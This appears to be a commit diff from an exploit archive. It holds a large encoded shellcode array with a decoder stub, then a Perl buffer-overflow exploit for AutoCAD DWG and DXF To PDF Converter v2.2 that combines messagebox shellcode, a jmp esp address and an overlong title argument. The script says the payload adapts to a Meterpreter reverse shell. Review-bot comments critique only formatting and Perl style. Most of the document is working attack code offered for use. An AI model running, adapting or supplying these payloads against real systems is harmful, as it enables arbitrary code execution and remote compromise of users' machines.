"\x8f\xb6\x4b\x4b\x48\x9f\x8b\x5b\x4b\x4b\x4b\x5a\x53\x3a\x1b\x3c"
"\x4b\x4b\x51\x37\x1b\x3b\x3b\x4b\x51\x37\xee\x31\xcb\x4b\x1b\x3b"
"\x3b\x4b\xec\xbf\x4b\x42\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x66\xb4\xb4\xb4\xb2\xa7\x6c\x4b\xfa"
"\x4b\x35\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x80\x53\x2e\xec\xae"
"\x49\xfe\x8f\x16\x4b\x4b\x48\xf4\x53\x2e\xec\xae\x49\xe4\x0a\x6b"
"\x4b\x43\x8f\x16\x4b\x4b\x48\xf0\x8b\x2a\x4b\x4b\x4b\x4b\xec\xae"
"\x49\xee\x8f\x16\x4b\x4b\x48\xfa\x8b\x2a\x4b\x4b\x4b\x4a\xec\xae"
"\x49\xd6\x8f\x16\x4b\x4b\x48\xe2\x8b\x2a\x4b\x4b\x4b\x49\xec\xae"
"\x49\xde\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\xea\x53\x2e\xec\xae"
"\x49\xc6\x8f\x16\x4b\x4b\x48\xd2\x53\x2e\xec\xae\x49\xcc\x8f\xb6"
"\x4b\x4b\x48\x34\x8b\x5b\x4b\x4b\x4b\x13\x8b\x3b\x4b\x4b\x4b\x0e"
"\x8f\x34\x4b\x4b\x4b\x19\x51\x37\x8f\x34\x4b\x4b\x4b\x1b\x8b\x3b"
"\x4b\x4b\x4b\x0a\x8f\x34\x4b\x4b\x4b\x07\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x75\x51\x37\x8f\x34\x4b\x4b\x4b\x0d\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x71\x51\x37\x8f\x34\x4b\x4b\x4b\x0b\x8b\x3b\x4b\x4b\x48\x1a"
"\x8f\x34\x4b\x4b\x4b\x77\x8f\x34\x4b\x4b\x4b\x70\x8f\x34\x4b\x4b"
"\x4b\x71\x8f\x34\x4b\x4b\x4b\x72\x8f\x34\x4b\x4b\x4b\x73\x8b\x3b"
"\x4b\x4b\x4b\x7c\x8f\x34\x4b\x4b\x4b\x7f\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x79\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x65\xec\x4e"
"\x4b\x66\x4b\x4b\x4b\x4b\x4b\x4c\x2a\xc9\xc2\xde\x2a\xe9\xc3\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4b\x4b\x4b\x4b\xe9\xc3\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\xec\x4e\x49\xa7\x8b\xab"
"\x4b\x4b\x4b\x40\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x53\x53\x2e"
"\xec\xbf\x49\x4f\xec\xa1\x4b\x5b\x8f\x16\x4b\x4b\x48\x45\x53\x2e"
"\xec\xbf\x4a\xb7\x8f\xb6\x4b\x4b\x49\xbd\x8b\x5b\x4b\x4b\x4b\x7e"
"\x8b\x3b\x4b\x4b\x49\xa1\x8f\x34\x4b\x4b\x4b\x64\x8b\x3b\x4b\x4b"
"\x49\xa9\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b\x49\x91\x8f\x34"
"\x4b\x4b\x4b\x6c\x8b\x3b\x4b\x4b\x49\x9d\x8f\x34\x4b\x4b\x4b\x68"
"\x8b\x3b\x4b\x4b\x4b\x53\x8f\x34\x4b\x4b\x4b\x54\x8b\x3b\x4b\x4b"
"\x4b\x55\x8f\x34\x4b\x4b\x4b\x50\x51\x37\x8f\x34\x4b\x4b\x4b\x52"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5e\xec\x4e\x4b\x5f"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\xe4\x8b\x5b\x4b\x4b"
"\x4b\x61\x8b\x3b\xb4\xb4\xb4\xac\x8f\x34\x4b\x4b\x4b\x6f\x8b\x3b"
"\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b\x4b\x6b\x8b\x3b\x4b\x4b\x49\xf8"
"\x8f\x34\x4b\x4b\x4b\x57\x8b\x3b\x4b\x4b\x4b\x50\x8f\x34\x4b\x4b"
"\x4b\x53\x51\x37\x8f\x34\x4b\x4b\x4b\x5d\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x59\xec\x4e\x4b\x5a\x4b\x4b\x4b\x4b\x4b\x5b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x53\xb7\x8f\x26\xb4\xb4"
"\xb4\xb3\xa7\x2c\x49\x1a\x4b\x35\x8f\xb6\x4b\x4b\x49\x3b\x8b\x5b"
"\x4b\x4b\x4b\x6a\x8b\x3b\xb4\xb4\xb4\xed\x8f\x34\x4b\x4b\x4b\x50"
"\x8b\x3b\x4b\x4b\x49\x13\x8f\x34\x4b\x4b\x4b\x5c\x8b\x3b\x4b\x4b"
"\x4b\x5d\x8f\x34\x4b\x4b\x4b\x58\x51\x37\x8f\x34\x4b\x4b\x4b\x5a"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x46\xec\x4e\x4b\x47"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\x08\x8b\x5b\x4b\x4b"
"\x4b\x7d\x8b\x3b\xb4\xb4\xb4\x3c\x8f\x34\x4b\x4b\x4b\x7b\x8b\x3b"
"\x4b\x4b\x4b\x62\x8f\x34\x4b\x4b\x4b\x67\x8b\x3b\x4b\x4b\x4b\x50"
"\x8f\x34\x4b\x4b\x4b\x63\x8b\x3b\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b"
"\x4b\x6f\x8b\x3b\x4b\x4b\x4b\x68\x8f\x34\x4b\x4b\x4b\x6b\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x57\xec\x4e\x4b\x50\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x5b\x49\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8b\xab\x4b\x4b\x4b\x47\x0a\x6b\x4b\x4f\x8f\x16\xb4\xb4"
"\xb4\xa7\xec\x23\x4b\x4c\xec\xbf\x4b\xba\xec\xa1\x4b\x59\x8f\x16"
"\x4b\x4b\x4a\xb2\xec\x23\x4b\x4d\xec\xbf\x4b\xa3\x8b\x1b\xb4\xb4"
"\xb4\x97\x8b\x3b\x4b\x4b\x4b\x47\xec\xae\x4b\x50\xec\xae\x4a\x22"
"\x8b\x1b\x4b\x4b\x4a\xa5\xec\xae\x4b\xc3\x8b\x1b\x4b\x4b\x4a\xa8"
"\x8b\x3b\xb4\xb4\xb4\xa5\xec\xae\x4b\x47\xec\xae\x4a\xce\x8b\xab"
"\xb4\xb4\xb4\xbd\x8b\x1b\xb4\xb4\xb4\x8b\xec\xbf\x4b\x3d\x8f\xb6"
"\x4b\x4b\x4a\x82\x53\x7c\x8f\xa4\x4b\x4b\x4a\xe4\x8b\x6b\x4b\x4b"
"\x4b\x07\x9c\x4c\x6b\x4b\x6b\x4b\x8b\x6b\x4b\x4b\x4b\x75\x9c\x44"
"\x6b\x4b\x6b\x4b\x8f\x14\x4b\x4b\x4b\x09\x8b\x5b\x4b\x4b\x4b\x74"
"\x8b\x3b\x4b\x4b\x4b\x79\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x7e\x8b\x3b\x4b\x4b\x4a\xd9\x8f\x34"
"\x4b\x4b\x4b\x7a\x8b\x3b\x4b\x4b\x4b\x55\x8f\x34\x4b\x4b\x4b\x66"
"\x8b\x3b\x4b\x4b\x4b\x69\x8f\x34\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x6e\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x6a\xec\x4e\x4b\x6b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69\x69\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xa6\x4b\x4b\x4a\x04\x53\x38\x53\xb2"
"\x8f\x26\xb4\xb4\xb4\xa1\xa7\x29\xab\x4b\x4b\xb5\xa7\x23\x3b\x4b"
"\xb4\xb5\xec\x4e\x4a\x7a\x8f\xb6\x4b\x4b\x4a\x1c\x8f\xa4\x4b\x4b"
"\x4a\x77\x8b\x5b\x4b\x4b\x4b\x7a\x8b\x3b\xb4\xb4\xb4\x85\x8f\x34"
"\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b\x4b\x6d\x8f\x34\x4b\x4b\x4b\x6c"
"\x8f\x14\x4b\x4b\x4b\x69\x8b\x3b\x4b\x4b\x4a\x60\x8f\x34\x4b\x4b"
"\x4b\x6b\x8b\x3b\xb4\xb4\xb4\x8a\x8f\x34\x4b\x4b\x4b\x57\x51\x37"
"\x8f\x34\x4b\x4b\x4b\x51\x51\x37\x8f\x34\x4b\x4b\x4b\x53\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5f\xec\x4e\x4b\x58\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xb2\x8f\x26\xb4\xb4\xb4\xbd\x53\xbd"
"\xa7\x23\x4b\xa9\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4a\x43\x8f\xa4"
"\x4b\x4b\x4b\xa0\x8b\x5b\x4b\x4b\x4b\x79\x53\x3a\x50\x37\x50\x37"
"\x50\x37\x8f\x14\x4b\x4b\x4b\x6e\x8f\x34\x4b\x4b\x4b\x63\x8f\x64"
"\x4b\x4b\x4b\x6a\x51\x37\x8f\x34\x4b\x4b\x4b\x68\x8f\x24\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x55\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x51\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x5d\xec\x4e\x4b\x5e\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xe2\x8f\x36\xb4\xb4\xb4\xbd\xa7\x33"
"\x4b\xd8\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4b\xf0\x8f\xa4\x4b\x4b"
"\x4b\xd7\x8b\x5b\x4b\x4b\x4b\x50\x53\x3a\x8f\x34\x4b\x4b\x4b\x5c"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5e\x51\x37\x8f\x34\x4b\x4b\x4b\x58"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5a\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x46\xec\x4e\x4b\x47\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x26"
"\xb4\xb4\xb4\xb2\xa7\x23\x4b\x2b\xb4\x35\x8f\x16\xb4\xb4\xb4\xa4"
"\x8f\x26\xb4\xb4\xb4\xa5\x8f\xa6\x4b\x4b\x4b\x2c\x4c\xb5\x8b\x5b"
"\xb4\xb4\xb5\xb0\x8f\x06\xb4\xb4\xb4\x4b\x8b\x6b\x4b\x4b\x4b\xcc"
"\xec\xc3\x4b\x5e\xa8\x7b\x5b\x4b\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4"
"\x52\x73\xec\x3f\x4b\x4d\xec\x23\x4b\xce\xec\xbf\x4b\x45\xa8\x1b"
"\x6b\x4b\x4b\x3d\x8b\x10\x4b\x4b\x4b\xb4\x51\x62\x51\x22\x52\x7e"
"\xec\x3f\xb4\xbc\x50\x22\x09\x2b\x5b\x4b\x51\x52\x50\x02\xec\x3f"
"\xb4\xa8\x4c\xb5\x8f\x06\xb4\xb4\xb5\x93\x8b\x5b\xb4\xb4\xb5\x86"
"\xec\xc3\x4b\xce\x8b\x6b\x4b\x4b\x4b\x11\x50\x62\xa8\x7b\x5b\x4b"
"\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4\x52\x73\xec\x3f\x4b\x4d\xec\x73"
"\x4b\x2e\xec\xbf\x4b\x42\x51\x68\xa8\x7b\x6b\x4b\x4b\x3d\x8b\x70"
"\x4b\x4b\x4b\xb4\x09\x7b\x5b\x4b\x51\x52\x50\x02\xec\x3f\xb4\xaf"
"\x4c\xb5\x5c\xb4\x8b\x0b\x4b\x4b\x4b\x5b\x1b\xbb\x0b\x4b\x13\x9b"
"\x0b\x4f\xd3\xa7\x9b\x47\x8b\x0b\x4b\x4b\x4b\x4c\x13\xbb\x0b\x4b"
"\x4c\xb5\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4a\x18\x78\xf7\x4a\x18\x78\xef"
"\x4a\x18\x7c\x5b\x4a\x18\x7d\x7d\x4a\x18\x7d\x23\x4a\x18\x7d\x6f"
"\x4a\x18\x78\x55\x4a\x18\x78\xc1\x4a\x18\x79\x07\x4a\x18\x78\x4d"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x49\x49\x7b\x72\x4b\x4b\x4b\x4b\x01\x02\x03\x9c\x09\x86\x7f\x97"
"\x8d\x8e\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x9d\x0a\x08\x87\x18"
"\x19\x92\x8f\x1c\x1d\x1e\x1f\x80\x81\x82\x83\x84\x85\x17\x1b\x88"
"\x89\x8a\x8b\x8c\x05\x06\x07\x90\x91\x16\x93\x94\x95\x96\x04\x98"
"\x99\x9a\x9b\x14\xff\x9e\x1a\x20\xa0\xe2\xe4\xe0\xe1\xe3\xe5\xe7"
"\xf1\xa2\x2e\x3c\x28\x2b\x7c\x26\xe9\xea\xeb\xe8\xed\xee\xef\xec"
"\xdf\x21\x24\x2a\x29\x3b\x5e\x2d\x2f\xc2\xc4\xc0\xc1\xc3\xc5\xc7"
"\xd1\xa6\x2c\x25\x5f\x3e\x3f\xf8\xc9\xca\xcb\xc8\xcd\xce\xcf\xcc"
"\x60\x3a\x23\x40\x27\x3d\x22\xd8\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\xab\xbb\xf0\xfd\xfe\xb1\xb0\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71"
"\x72\xaa\xba\xe6\xb8\xc6\xa4\xb5\x7e\x73\x74\x75\x76\x77\x78\x79"
"\x7a\xa1\xbf\xd0\x5b\xde\xae\xac\xa3\xa5\xb7\xa9\xa7\xb6\xbc\xbd"
"\xbe\xdd\xa8\xaf\x5d\xb4\xd7\x7b\x41\x42\x43\x44\x45\x46\x47\x48"
"\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51"
"\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c\xf7\x53\x54\x55\x56\x57\x58\x59"
"\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30\x31\x32\x33\x34\x35\x36\x37\x38"
"\x39\xb3\xdb\xdc\xd9\xda\x9f\xf0";

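Review bot: the banner above `char sc[]` at the end of this hunk uses `\* ... *\` delimiters, which are not C comments, so the array cannot be compiled as pasted; it should be `/* ... */`. The relation between `sc[]` and the assembler source above it is also undocumented: the array opens with the same bytes as the decoder stub (`\x90\x64\xd0\x0c` for `STM 6,4,12(13)`), continues with the two `DEADBEEF` egg words and the `dba79b47...` encoded buffer, and finishes with the E2ABUF bytes, but no comment says so or which file the decoder parameters (`X'4b'`, `CHI 1,2088`) were generated from. The assembler part of the file also ends twice (`END @SETUP`, then an `eof marker` constant and a second bare `END`); anything after the first `END` is not assembled, so that trailer belongs in the other source or should be removed.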
platforms/win64/dos/38085.pl Executable file

File diff suppressed because one or more lines are too long

@ -0,0 +1,48 @@
#*************************************************************************************************************
#
# Exploit Title: AutoCAD DWG and DXF To PDF Converter v2.2 Buffer Overflow
# Date: 9-5-2015
# Software Link: http://www.verypdf.com/autocad-dwg-dxf-to-pdf/dwg_dxf_to_pdf_setup.exe
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The title parameter passed into the program that specifies the title of the converted PDF is vulnerable to a buffer overflow.
# This can be exploited using EIP direct overwrite, SEH bypass, and ROP.
# EIP was easier and afforded more universal exploitation so I went that route after SEH bypass limited the exploit's universal OS compatibility
# Enjoy! (Proofs included)
#
# Instructions: Run this as-is (if on x64 platform) and hit the [try] button when the program opens.
#
#**************************************************************************************************************
#standard messagebox shellcode.
#Adapts readily to windows/meterpreter/reverse_tcp using msfvenom --smallest
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
open(myfile,'>crasher.dwf'); #generate the dummy DWF file
print myfile "yattayattayatta"; #gibberish to go in file
close (myfile); #close the file
$sploit=pack('V',0x100126db); #jmp esp specific to Windows 7 x64 [found within the packed section of the executable :) ]
$cmd='"C:\\Program Files (x86)\\AutoCAD DWG and DXF To PDF Converter v2.2\\dwg2pdf.exe"'; #change this if you are on a 32-bit based processor
$cmd .= ' -t "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAargvbhewthvboiwetuhnvoehntoeqothnogobtehnvohjnoeqhngovenhjotgvnoehnogveoqnvobeqntgoh2io4gh894gh942h9gth249h92hg49h2g9h429gh4g9h429hg9th4g9h489gh849hg894h982hg984hg98h4298hg9842hg8942hg8942h298hg4298hg8942hg894hg9hg398gh78358h35g3h8352g8h32h5g8v3ig25bgb3958v938g983h98g3h9gh3259hg3529gh93vbh98v893hg89h5329g8h3598gth93vb583gfb9358fb929b3g29b8g25389bg2538b9g5238b952g38bg925gb28958b925v89bcc88r2cxnbx2rnb982c552b89c25vb8725vg852v8528g52g8258787g5g87253g8723487gfc32g87c23g78c23g78cg387cg7823c2g837cg738cg7853S25hg532gfh3295g8h83295gtf352tu539t8u3529tg5938gt932ut235yt9235yt98325yt92358yv8935vy8953vy5239vy293v8y352v98y32895vy9352yv932yv9y329vy239vy9325y298fy92358fy9253fn53ngj25ngn53n53ngln235lgn2l35ngl235ng3ljnghln3hg239hbu390gu23905ug935guy92835ut893ug9u39gvu935ugvb8953u938ug9835y2395fy2398fy9325fy9325yf932yf9y2359f2359fy2395vy598vy5392vy2395vy3295yv9358yv39258vy9238yv9235hgt9h23g59h23';
$cmd .= $sploit;
$cmd .= $shellcode;
$cmd .= '" -i crasher.dwf -o test.pdf'; # append our arguments to the end
system($cmd);
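Review bot: the `Website:` and `CVE:` header fields in this hunk are left empty and the description says "Enjoy! (Proofs included)" although nothing beyond the script is in the commit; either fill the fields in or drop them so the record does not imply a CVE was assigned. On the code, `open(myfile,'>crasher.dwf')` uses a bareword filehandle and ignores the return value, so a failed create in the working directory silently produces a `-i crasher.dwf` argument that points at a file that does not exist; `open(my $fh, '>', 'crasher.dwf') or die "crasher.dwf: $!"` is the idiomatic form, with `close($fh)` to match. The comment on the `$cmd` path ("change this if you are on a 32-bit based processor") should state what to change, namely the `Program Files (x86)` directory, and the `Instructions:` line should say the same so the two do not disagree.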